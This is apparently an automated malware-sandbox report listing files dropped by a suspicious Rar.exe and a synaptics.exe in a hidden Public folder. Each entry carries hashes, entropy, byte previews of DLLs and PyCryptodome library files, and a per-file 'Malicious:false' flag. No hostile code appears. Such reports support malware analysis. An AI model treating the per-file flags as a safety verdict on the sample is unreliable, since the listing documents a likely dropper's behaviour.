                                                                                                                                                                                      Preview:o..........f.........................@...s8...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d...Z.d.d...Z.d.d...Z.d.S.)......)...DerSequence..DerInteger..DerBitString..DerObjectId..DerNullc....................C...s....t...j.|.d.d...}.t...j.|.d...d.d...}.t.....|.d.....}.t.....|.d.....j.}.t.|...d.k.r,d.}.n.z.t.....|.d.......d.}.W.n.......|.d...}.Y.|.j.|.|.f.S.).z.Parse a SubjectPublicKeyInfo structure... It returns a triple with:. * OID (string). * encoded public key (bytes). * Algorithm parameters (bytes or None). .......Z.nr_elementsr....)......r....r....N).r......decoder....r......value..lenr....)...encoded..spkiZ.algo..algo_oidZ.spkZ.algo_params..r.....KC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\PublicKey\__init__.py.._expand_subject_public_key_info....s............................r....c....................C...s@...|.d.u.r.t.t.|...g...}.n.t.t.|...|.g...}.t.|.t.|...g...}.|.....S.).N).r....r....r......encode).r....Z.public_key..params..algorithmr....r....r....r...
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):720896
                                                                                                                                                                                      Entropy (8bit):7.668141455946428
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:uad892HoxJ8gf2266y8IXhJvCKAvqVLzcrZgYIMGv1iLD9yQvG6h2:uady2HoxJFf2p3bhcrn5Go9yQO6o
                                                                                                                                                                                      MD5:4265AFF5E6C9B13A397DB9FB5DB7E0F8
                                                                                                                                                                                      SHA1:E82C09FD6C0CEFD3DB6C85B675AA1DBEC3B84849
                                                                                                                                                                                      SHA-256:54F51DBA779A9FE9C0CA18A62D2BF696A7463FB76EEB5B79AC0761BEDCFF58F5
                                                                                                                                                                                      SHA-512:D6BD223A48664BC8B1FA3600D621515F492681FC147026B56C9B5B001F36961E84B6FAD4605A37D09DA2B1C10F37E7BE3F361EFAD53D36B07955832615D55EA4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I.....Z...Z...Z..jZ...Z...[...ZF..[...Z...Z*..Z...[...Z...[...Z...[...Z7..[...Z7..[...Z7..Z...Z7..[...ZRich...Z........PE..L...:..e...........!...%............T........ ...............................@............@.........................@...d.......d.... .......................0..........................................@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data...............................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):22528
                                                                                                                                                                                      Entropy (8bit):6.105707923864752
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:It9aokJdjVNiqNJ5vTVu7C6dWM9FVTCIhQ5xWEARnlYT:IZkFNiqL5T+CyWMFV9hQ50EClYT
                                                                                                                                                                                      MD5:E36E97264A271CBB7FA58DF7E873382C
                                                                                                                                                                                      SHA1:213CD5DAA4EF7463D436ED49D972FC176BFB8E38
                                                                                                                                                                                      SHA-256:C58844CFA2B34C5AA197DFD8C891F1D06EA08B7B1F91D87DB5A0B93BB349A87D
                                                                                                                                                                                      SHA-512:18E0EF6EB7AA5B856BF76339D8FD59D9CBC46AB3226AC0C9773ADB8D8210361409AF443B33BE0C9CFADC9E6FA9B6DD377690E06FC557F59CC17C347D97385A38
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i...i...i....P..i.......i......i...i...i.......i.......i.......i.......i.......i....<..i.......i..Rich.i..........PE..L...;..e...........!...%.@..........N........P............................................@.........................@U..0...pV..d....p...............................Q.............................. Q..@............P..x............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...T....`.......N..............@....rsrc........p.......T..............@..@.reloc...............V..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):48128
                                                                                                                                                                                      Entropy (8bit):6.2529879407981
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:TqWAfiKd/obDZoaZweTh3W1dzl4Ow0ffPp0TGUMIoSb4HoaEB4:TgAbDZo4hsbZnPCTMIoSb4HoaZ
                                                                                                                                                                                      MD5:39FB9B0D6C84C01B4BF29AAB7AB897C0
                                                                                                                                                                                      SHA1:91130A7F119D380B583D0AA5238A3142A90F1299
                                                                                                                                                                                      SHA-256:9EC53C4D0531806B15C4AC4A4E3DF0B279DE3B85FB4F42874F855A99E5E1D72A
                                                                                                                                                                                      SHA-512:2117B21C5AE23CABE694F0E1D18B1BD558F3C1CE69C079A85F79609D515ABE3D0BED4B4061541FBD17C9541300461FD94DB78A723D78DBD030A069E35F03DA04
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........em...>...>...>...>...>...?...>...?...>...>...>...?...>...?...>...?...>...?...>...?...>...>...>...?...>Rich...>........................PE..L...<..e...........!...%..... ......T.....................................................@.............................h...h...d...................................x...................................@...............|............................text...5........................... ..`.rdata..............................@..@.data...p...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5261
                                                                                                                                                                                      Entropy (8bit):5.187172722384075
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:M4DqrYJALrYJHdt3EHGuIcWIKiYHbJM/pQ4W8NtOH6mCli0yZRYAD0Ov:Jqrskrs9t3q/Ih2/yzy66NlNyQW0Ov
                                                                                                                                                                                      MD5:1BCBC8A97A925C34AAA01860EE4D8D63
                                                                                                                                                                                      SHA1:CCF52E350B94DA06E6D8980E31CB93300A70B1C4
                                                                                                                                                                                      SHA-256:B92D60974EF5FF39314516C2FA7ADF20886C4201C9AEA68EC633F921D4ED4B63
                                                                                                                                                                                      SHA-512:BF9AB4DC9294CC4E70D500E594D72923722EC9A528B59881649730B89E4B6F89CCFD3E056A4DCEE0A59B416CEC513C2F7D97C326B680149173BAE01C9DC99394
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2019, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):331
                                                                                                                                                                                      Entropy (8bit):4.758113161274864
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:1REYB6RNx6FJdRloxdRX8jL8SdyAEBfFpU80/p9YKXrH0L8Sy:1REYB6RT61Rlo3RX8jLVMBM80/p+MrUe
                                                                                                                                                                                      MD5:8BEBFA73A502269CB8A0C4CE6C714C5A
                                                                                                                                                                                      SHA1:176037806AA4E83D03FEDCC40CBACF9D1D5F675A
                                                                                                                                                                                      SHA-256:564C2B01DC5D096BF508761DB881E201172E2D60E939BA2F78E20BE46A74DDA0
                                                                                                                                                                                      SHA-512:50C4AE1F408F98EA4650966444F3E552559A3D92ED79EC66E0C3424A6EBAA11AD577F47853C91BCDC1B5910C2A2815D55CCEFD23D5C1E0BD4F02136CCB3D8884
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Tuple....def read_int4(data: bytes) -> Tuple[int, bytes]: .....def read_bytes(data: bytes) -> Tuple[bytes, bytes]: .....def read_string(data: bytes) -> Tuple[str, bytes]: .....def check_padding(pad: bytes) -> None: .....def import_openssh_private_generic(data: bytes, password: bytes) -> Tuple[str, bytes]: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8704
                                                                                                                                                                                      Entropy (8bit):4.911844496867438
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:+5qu39PERtoqPAF+7BWM8o5WJ1ks/vnpjOQhWd0xiMmGffQzQrXd:iqu39PE5guBWMNWJzhjOQUixiMVnkwN
                                                                                                                                                                                      MD5:A2556847EDC0C83BD663BDCF0DE3CA66
                                                                                                                                                                                      SHA1:B732652A1EFB8A3CFE3203C8ABA35CCD8DCE254A
                                                                                                                                                                                      SHA-256:50912E465830D1DBA13CA796D1B09FC85DEC83C9EF1C2AB1948366FD95B7C0BC
                                                                                                                                                                                      SHA-512:9F93B8C70B8D5EA9E16959F90535F92A73CC7A178BD2BD51D11EF5F59EFEDB0AD4A1A435B63AE85A7D824F661221964E2F1B69AF38F18BB7A74B4F0B3EE07A7C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................R.................................................N.......N.......N>......N......Rich....................PE..L...;..e...........!...%............N........ ...............................`............@.........................@%..P....%..P....@.......................P..@....!...............................!..@............ ..h............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..@....P....... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1866
                                                                                                                                                                                      Entropy (8bit):5.171387928684167
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:hIB0jcQHMsvI/S3oCFadPyopEm7XRXTR5:SFQHvohqTm7XRXF5
                                                                                                                                                                                      MD5:F6DAA1095142342733AB132C05D1DDFE
                                                                                                                                                                                      SHA1:1EBAFA39A224F69887333A00E0AE1BD69178315E
                                                                                                                                                                                      SHA-256:05E8D3E5D2B18C1731189DB337B04CB83E966DC385930836FA22E9EE0F376FB9
                                                                                                                                                                                      SHA-512:246058D7F397CDCACE81B09FDEBA5B17C240264A70375D99B4FD0FFBFFC54208D312BC38894E74B531BD3F9CB40105FA9DD834C74250B73A0C8E8DB583FB0E41
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Random/__init__.py : PyCrypto random number generation..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ==
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):386
                                                                                                                                                                                      Entropy (8bit):4.828244249619416
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:1REYBFovLD2dC1ZSM+mHv0tAE7Ky3L5RSMtAMjMEFy7yA4TSJDZj5:1REYB8D2ACM+meh7KyVVpJy7yAGkDR5
                                                                                                                                                                                      MD5:A4CDA07BACD9EDBD7C0243B029D79400
                                                                                                                                                                                      SHA1:B068F43B0EAE31972C2B6C6335BBCA2497B948FB
                                                                                                                                                                                      SHA-256:3A9548EF07A83C2F2BF7DB05EDB776BD788B9D9C112EA8155333242839CC27D7
                                                                                                                                                                                      SHA-512:A1412BAF95D6910D821B927BE91CFD740F2DD8A98E259950E5FF06409CEC8E01EB6B06AC1747A8FF06098849142EBF2754AEED361FFCD37954FFFC13BCE1D3C0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Any....__all__ = ['new', 'get_random_bytes']....from os import urandom....class _UrandomRNG(object):.... def read(self, n: int) -> bytes:..... def flush(self) -> None: ..... def reinit(self) -> None: ..... def close(self) -> None: .......def new(*args: Any, **kwargs: Any) -> _UrandomRNG: .......def atfork() -> None: .......get_random_bytes = urandom....
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1259
                                                                                                                                                                                      Entropy (8bit):4.6658059178113716
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:NOtWRuX2i3FOd3krWhInkOCUqxUNRQj/jfhlHJ4fEByWkJwjGP4gE/:NZRHd02UEU9iDrtP6Af
                                                                                                                                                                                      MD5:1FCEF4642458B7B2AEC8F4EDD8769514
                                                                                                                                                                                      SHA1:8DFE507B35AA4B84A08E7797AC704334DC0A4B7D
                                                                                                                                                                                      SHA-256:64AC92C155F44292FC051885661E0F40B19EF0CA378D3D082F33F0D9EE07DA73
                                                                                                                                                                                      SHA-512:A67D8A79DAD11F2CBD0FD9B0FD17EA7C5AD83988DF77D5204876D554DD4F17F79D38C64541BB85DE69ADCC6A0388F62E91B4D52CD20DFF527160495FE5CFB2E0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fJ........................@...s<...d.d.g.Z.d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.d...Z.e.Z.d.S.)...new..get_random_bytes.........urandomc....................@...s,...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._UrandomRNGc....................C...s....t.|...S.).z0Return a random byte string of the desired size.r....)...self..n..r.....HC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Random\__init__.py..read....s......z._UrandomRNG.readc....................C........d.S...z0Method provided for backward compatibility only.Nr......r....r....r....r......flush!..........z._UrandomRNG.flushc....................C...r....r....r....r....r....r....r......reinit%...r....z._UrandomRNG.reinitc....................C...r....r....r....r....r....r....r......close)...r....z._UrandomRNG.closeN)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r....r........s..............r....c....................O...s....t...S.).zFReturn a file-like object that outputs cryptographi
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3396
                                                                                                                                                                                      Entropy (8bit):5.311015065875513
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Gk/Yq7x6J5PPcWgudGUJFp9YY3sjuhXNvLHf85jL:GWY5PP7gO8Y31hdvLH6
                                                                                                                                                                                      MD5:F4907389F0D7E69224178BCBE6D44A86
                                                                                                                                                                                      SHA1:3F80396CACE704CF061AA5CAE2BE955C86DC0707
                                                                                                                                                                                      SHA-256:633A3ED69A0F4FEEEEAF8E4D772228C55D0983FBC983C0E79C3AD91B83D67E20
                                                                                                                                                                                      SHA-512:40A3BD59EC2CBD8BA48D9875E5E261DBF83F0029C191C4CC5AC6A4684E36C9304720955B518A1E7C8C010D068CC3D13ADDF7620CD594C9DC80C7DAA74F0546E1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...sv...g.d...Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.e...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.S.).)...StrongRandom..getrandbits..randrange..randint..choice..shuffle..sample.....)...Random)...is_native_intc....................@...sF...e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....Nc....................C...sX...|.d.u.r.|.d.u.r.d.|._.d.S.|.d.u.r.|.d.u.r.|.|._.d.S.|.d.u.r(|.d.u.r(|.j.|._.d.S.t.d.....).Nz(Cannot specify both 'rng' and 'randfunc')..._randfunc..read..ValueError)...self..rng..randfunc..r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Random\random.py..__init__ ...s..................z.StrongRandom.__init__c....................C...s:...|.j.d.u.r.t.....j.|._.d.|.>.d...}.|.t.|...t.|.d.......@.S.).z%Return an integer with k random bits.N..........).r....r......newr......bytes_to_long..ceil_div).r......k..maskr....r....r....r....*...s............z.StrongRandom.getrandbitsc.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5372
                                                                                                                                                                                      Entropy (8bit):4.828979692628258
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:o5wfFQHvoeTcHIpVaRhNkNNrvvGDwotbxcOV+gnNflG7b0/Yt5:o5wdQHv5rjIvsotlcU+g60/S
                                                                                                                                                                                      MD5:3BD14C0DD7FE75741EE0742BDA794418
                                                                                                                                                                                      SHA1:31B75C61FEA51D7E69247B3D47FC37DE5247C817
                                                                                                                                                                                      SHA-256:01ADBD3F51A22F71EDD8B3FB3F45BB849C9D9A46E00A7CFD25C28EA780512E3C
                                                                                                                                                                                      SHA-512:4FE054877C0749994FDE32CEA437C659FD2B406E3E057A2D9C27ADCFF6E556D8FEC48615B01AAD7B6502B40E5CF7C2CA342B626DB8D07F191E2D63FBD9E15E28
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# Random/random.py : Strong alternative for the standard 'random' module..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# C
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):854
                                                                                                                                                                                      Entropy (8bit):4.891350639959851
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1REqJBQCf+sAJOIE5P0fid1o4zOZKXiojo/f:lQW+sd5CidO4ifao/f
                                                                                                                                                                                      MD5:0B01F3499238530A9A99E48F305DB9AC
                                                                                                                                                                                      SHA1:7AE9ADEAF96CF6B47C721A124AA568AB1A0B605C
                                                                                                                                                                                      SHA-256:043AEDA2F263A42A0086FCBB0CA801FF1D9BF396FFCC966452FF25DD5030A013
                                                                                                                                                                                      SHA-512:4CDCFA0E53EBE9F65207817A79419F6C60E6F0BB51EF4ECDB89736244058A690410F767EC8AAAC2C2B10BDB38361E0F60FCD3DF3580639935A423A0E6E068517
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Callable, Tuple, Union, Sequence, Any, Optional, TypeVar....__all__ = ['StrongRandom', 'getrandbits', 'randrange', 'randint', 'choice', 'shuffle', 'sample']....T = TypeVar('T')....class StrongRandom(object):.. def __init__(self, rng: Optional[Any]=None, randfunc: Optional[Callable]=None) -> None: ... # TODO What is rng?.. def getrandbits(self, k: int) -> int: ..... def randrange(self, start: int, stop: int = ..., step: int = ...) -> int: ..... def randint(self, a: int, b: int) -> int: ..... def choice(self, seq: Sequence[T]) -> T: ..... def shuffle(self, x: Sequence) -> None: ..... def sample(self, population: Sequence, k: int) -> list: ......._r = StrongRandom()..getrandbits = _r.getrandbits..randrange = _r.randrange..randint = _r.randint..choice = _r.choice..shuffle = _r.shuffle..sample = _r.sample..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3680
                                                                                                                                                                                      Entropy (8bit):5.085786985818767
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:NCwEIB0jcQHMsvI/S3oCF2D0BVjtxxtDP5H8k/38KlKKFpBnFRNxtZFRtf/hzdrB:UwfFQHvo58zGk/sEjd/1drB
                                                                                                                                                                                      MD5:CF0E3F50FEEC49E1E243B3576BC34E7A
                                                                                                                                                                                      SHA1:D9AD4301C9F023D2067384BB241859B032B6C92B
                                                                                                                                                                                      SHA-256:EC3B0CB878618BF4A7ADCF497146F4CA3F203B448EA510ABE8B72C9A55568347
                                                                                                                                                                                      SHA-512:A4C3C13B23ECD0B8E20726C92741BE318CDD5DC39BD4125246EF06227F1DD2534B378F88B305AB6AC51A7ECABA88A4E80B9956BC9B234666F316516E5EE513F7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/__init__.py: Self-test for cipher modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WIT
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17826
                                                                                                                                                                                      Entropy (8bit):4.6460648083415315
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:ywdQHvJyFTEaHPRZn46TEiQTEgt4QY2zE/xHN8XZBU:yUeJgpTQY2zE/t6XZC
                                                                                                                                                                                      MD5:8D17B3809421F8A3272394DE1E9F13E0
                                                                                                                                                                                      SHA1:3B0A85C4645452F4D5397720A19139A0A0520A19
                                                                                                                                                                                      SHA-256:4BE599673037E90D439F42B30E06F975F906E92135820B3B14808FEE7BF44339
                                                                                                                                                                                      SHA-512:F08B0F988B52906991668DC6B5236B4D47F9074BEBB2BE164D37D01E964CB8F14A2CE7BAC3D035651347A53AC6D9497E733B422D04E79924316A31158129418A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/common.py: Common code for Crypto.SelfTest.Hash..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):73082
                                                                                                                                                                                      Entropy (8bit):4.7352476642791395
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:YH+534+If+1xcBWF2bwMnjrpCPLJCDXGsFKhKO5YQwa:YWykMMJwXZqWQ5
                                                                                                                                                                                      MD5:D5746D4A7B92D02CD239C5141A758A90
                                                                                                                                                                                      SHA1:F4898202BCB85AA3A95BF963C258DA625C140868
                                                                                                                                                                                      SHA-256:C63E2F372BCC41EC2C4667A8C8036378D920F96E66EA6E74F1061AE18FC2C181
                                                                                                                                                                                      SHA-512:C07BEE7D084F6934DB1814C8B69124ECF4FE72933FF5960A880C719E58628244D9554103110ECE7F56DBEA410A0FB751EFC848A5DB36CB8537E9B2ED54976B8A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
